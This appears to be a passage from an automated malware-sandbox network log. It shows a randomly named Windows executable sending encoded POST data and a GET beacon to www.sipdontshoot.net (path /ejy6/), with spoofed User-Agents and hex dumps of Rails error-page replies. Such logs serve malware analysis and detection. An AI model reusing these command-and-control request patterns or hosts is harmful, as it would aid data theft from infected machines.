                                                    Data Ascii: ss="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" d
                                                    Nov 21, 2024 16:18:19.133707047 CET1236INData Raw: 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 37 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69
                                                    Data Ascii: s="trace-frames" data-frame-id="17" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></
                                                    Nov 21, 2024 16:18:19.133744955 CET1236INData Raw: 65 20 3d 20 65 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 20 68 69 64 64 65 6e 22 2c 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 65 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                    Data Ascii: e = el.className.replace(" hidden", ""); currentSource = el; } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_tabl
                                                    Nov 21, 2024 16:18:19.253535986 CET1236INData Raw: 20 64 61 74 61 2d 68 65 6c 70 65 72 3d 27 70 61 74 68 27 3e 0a 20 20 3c 74 64 20 64 61 74 61 2d 72 6f 75 74 65 2d 6e 61 6d 65 3d 27 27 3e 0a 20 20 3c 2f 74 64 3e 0a 20 20 3c 74 64 3e 0a 20 20 20 20 47 45 54 0a 20 20 3c 2f 74 64 3e 0a 20 20 3c 74
                                                    Data Ascii: data-helper='path'> <td data-route-name=''> </td> <td> GET </td> <td data-route-path='/*path(.:format)'> /*path(.:format) </td> <td> <p>main#index {:path=&gt;/.*/}</p> </td></tr> </tbody></table><script type


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.5 | 49986 | 216.40.34.41 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:20.572494030 CET | 815 | OUT | POST /ejy6/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.sipdontshoot.net
                                                    Referer: http://www.sipdontshoot.net/ejy6/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 71 49 46 72 68 36 44 48 64 69 79 49 32 76 4c 43 43 62 6e 52 30 72 58 6e 70 38 44 71 7a 52 37 48 66 30 4c 42 6b 43 71 66 6b 4b 31 65 44 67 76 4f 39 32 6c 53 67 47 44 4c 61 62 69 78 2f 45 66 2b 63 72 59 57 6f 74 48 56 36 54 52 6e 59 33 31 7a 68 71 36 55 67 78 35 53 46 67 33 63 30 33 4b 4a 4c 57 53 47 59 4a 57 4e 38 4f 56 7a 75 41 2b 39 34 6c 59 33 70 37 4c 6d 76 53 39 46 6b 6f 36 66 64 52 79 57 42 4c 2f 70 42 47 38 4c 6a 56 7a 4e 45 4d 4e 67 37 6d 58 34 50 73 55 5a 66 34 77 62 59 6c 46 73 64 6f 6d 77 69 74 35 39 52 4d 46 58 48 65 75 6b 77 51 43 6c 36 37 69 56 65 54 7a 76 4a 53 6c 38 43 56 7a 35 62 54 56 75 74 5a 71 61 68 2f 4a 36 44 5a 6e 57 51 55 72 44
                                                    Data Ascii: StWXF0Jx=qIFrh6DHdiyI2vLCCbnR0rXnp8DqzR7Hf0LBkCqfkK1eDgvO92lSgGDLabix/Ef+crYWotHV6TRnY31zhq6Ugx5SFg3c03KJLWSGYJWN8OVzuA+94lY3p7LmvS9Fko6fdRyWBL/pBG8LjVzNEMNg7mX4PsUZf4wbYlFsdomwit59RMFXHeukwQCl67iVeTzvJSl8CVz5bTVutZqah/J6DZnWQUrD
                                                    Nov 21, 2024 16:18:21.717551947 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html; charset=UTF-8
                                                    x-request-id: 3fe04f35-cfa6-45d3-b1a0-28d151e173c8
                                                    x-runtime: 0.036349
                                                    content-length: 17167
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                    Nov 21, 2024 16:18:21.717633009 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                    Nov 21, 2024 16:18:21.717686892 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                    Nov 21, 2024 16:18:21.717725039 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                    Nov 21, 2024 16:18:21.717760086 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                    Nov 21, 2024 16:18:21.717813015 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                    Nov 21, 2024 16:18:21.717848063 CET1236INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                    Nov 21, 2024 16:18:21.717889071 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                                    Data Ascii: patch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">r
                                                    Nov 21, 2024 16:18:21.717921972 CET1236INData Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e
                                                    Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
                                                    Nov 21, 2024 16:18:21.717962027 CET1236INData Raw: 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68
                                                    Data Ascii: "_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <
                                                    Nov 21, 2024 16:18:21.837644100 CET1236INData Raw: 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d 61 74 63 68 54 65 78 74 29 20 7b 0a
                                                    Data Ascii: ny matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with result f


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.5 | 49987 | 216.40.34.41 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:23.256458998 CET | 1832 | OUT | POST /ejy6/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.sipdontshoot.net
                                                    Referer: http://www.sipdontshoot.net/ejy6/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 71 49 46 72 68 36 44 48 64 69 79 49 32 76 4c 43 43 62 6e 52 30 72 58 6e 70 38 44 71 7a 52 37 48 66 30 4c 42 6b 43 71 66 6b 4c 4e 65 44 53 6e 4f 79 31 39 53 68 47 44 4c 51 37 69 77 2f 45 66 76 63 76 38 53 6f 73 37 76 36 56 56 6e 59 56 74 7a 70 34 53 55 75 78 35 53 48 67 33 64 77 33 4b 6d 4c 57 69 43 59 4a 47 4e 38 4f 56 7a 75 42 4f 39 37 33 67 33 36 72 4c 6c 6f 53 39 4a 67 6f 37 41 64 52 71 5a 42 4c 36 65 42 57 63 4c 69 30 44 4e 44 70 5a 67 79 6d 58 36 4f 73 55 6f 66 34 38 55 59 6a 68 67 64 6f 37 62 69 71 56 39 53 71 4e 4d 64 76 4b 56 69 77 57 39 32 49 6d 41 49 44 79 44 45 51 5a 70 64 56 62 6c 62 69 74 42 6a 4e 71 66 71 39 6f 56 52 2f 33 52 51 77 4b 74 4d 52 34 54 63 77 54 32 72 72 34 72 68 58 75 54 36 6b 4b 76 43 66 30 30 48 4d 54 67 6d 64 35 33 6e 51 32 5a 39 47 51 6f 50 46 38 70 6c 74 50 32 4a 6f 54 52 58 56 4d 31 50 4c 46 50 59 4f 6c 43 4b 6d 34 4d 73 6b 6a 34 75 6f 79 34 69 31 30 33 71 76 74 37 4d 4a 63 62 33 36 77 4d 6f 59 6d 2b 64 56 4f 65 52 7a 4c 6f 65 6a 38 56 50 [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=qIFrh6DHdiyI2vLCCbnR0rXnp8DqzR7Hf0LBkCqfkLNeDSnOy19ShGDLQ7iw/Efvcv8Sos7v6VVnYVtzp4SUux5SHg3dw3KmLWiCYJGN8OVzuBO973g36rLloS9Jgo7AdRqZBL6eBWcLi0DNDpZgymX6OsUof48UYjhgdo7biqV9SqNMdvKViwW92ImAIDyDEQZpdVblbitBjNqfq9oVR/3RQwKtMR4TcwT2rr4rhXuT6kKvCf00HMTgmd53nQ2Z9GQoPF8pltP2JoTRXVM1PLFPYOlCKm4Mskj4uoy4i103qvt7MJcb36wMoYm+dVOeRzLoej8VPIuqZDaRmPjXThGwYyDGmU3jQkiKcm65/Mtcenb/PF5Ljm1N5dolVgfiecoQZUmGQwVLdgVHZG4K7n+voJlLRvO6tDMS9dbFEz3i5TJWcY/KZFBU2TR0xIIRfoc9+XHJ5RHldS8zPo5UF52gdnil1oxFKUvoSX0IcnxQZxnRDMQapVbuFZAKmGB28mmUebZNz9LJxm8tfPsFhW0XtoA+hVEMcbNDxD3gBAV32BuhjwIHdpf7bkXzCU0HRTaq0evVK3V/v13h9jy0wREDBKILVeBOCBLVQwTOWe9jSDqjEW4rfZr54HONofPvoLfDMJ8zzPh0n9CN1NoVhOt3tY+CK8cQb3qHHylS2aFPn3ESVNEHOroyG08EHqdVgT/JT5snG49eFzYlejw8H9W5g+i0OPvzZmSJGkfa/LfDJVuKV+qfMCmGJgMBWhBJjk+IZqEIgeXfIySLwm9L/RoGlGmh2XLGQlSQJWtL2hDtJxrdCf0ejsUk4X3GYEiwhE8/TKfyYQiEKUb11Oqjks2PhmMq4bMIoNuhvm8llJI/Llqa2jBmZM3wjxwFNuY8DwSps8a2xLnzodeVHia8uh+B6J1sV1u+bzLJ133GMZL94lavoj4KgfDEHGn//QPJophA0J5PSXBlVMbioWPh9bAbkykWRPGDyA86fmP3Bg1 [TRUNCATED]
                                                    Nov 21, 2024 16:18:24.519996881 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html; charset=UTF-8
                                                    x-request-id: ed04a8f0-3ab8-4ec9-8771-a218b09400f0
                                                    x-runtime: 0.038671
                                                    content-length: 18183
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                    Nov 21, 2024 16:18:24.520073891 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                    Nov 21, 2024 16:18:24.520128965 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                    Nov 21, 2024 16:18:24.520181894 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                    Nov 21, 2024 16:18:24.520221949 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                    Nov 21, 2024 16:18:24.520256042 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                    Nov 21, 2024 16:18:24.520289898 CET1236INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                    Nov 21, 2024 16:18:24.520323992 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                                    Data Ascii: patch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">r
                                                    Nov 21, 2024 16:18:24.520356894 CET1236INData Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e
                                                    Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
                                                    Nov 21, 2024 16:18:24.520392895 CET1236INData Raw: 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68
                                                    Data Ascii: "_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <
                                                    Nov 21, 2024 16:18:24.640146971 CET1236INData Raw: 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d 61 74 63 68 54 65 78 74 29 20 7b 0a
                                                    Data Ascii: ny matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with result f


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.5 | 49988 | 216.40.34.41 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:25.974109888 CET | 531 | OUT | GET /ejy6/?StWXF0Jx=nKtLiO3xWkrMlPGEGL30zIXLkoLy8zu8J2L8rFbijJp7RB7dx3B4j1jKRr2O123OfZ5OtYyfrlQmcwQG+aranSp3PUfv2y2fa3KrcIq96NlU6xjN1E0Tt4TY0B9th5DEOw==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:27.090627909 CET | 1236 | IN | HTTP/1.1 200 OK
                                                    x-frame-options: SAMEORIGIN
                                                    x-xss-protection: 1; mode=block
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    referrer-policy: strict-origin-when-cross-origin
                                                    content-type: text/html; charset=utf-8
                                                    etag: W/"a6122b845a4bbd54dfbf1d1738352f32"
                                                    cache-control: max-age=0, private, must-revalidate
                                                    x-request-id: 4cb8c9cf-e9e0-486b-a5fd-68d052b450c1
                                                    x-runtime: 0.005369
                                                    transfer-encoding: chunked
                                                    connection: close
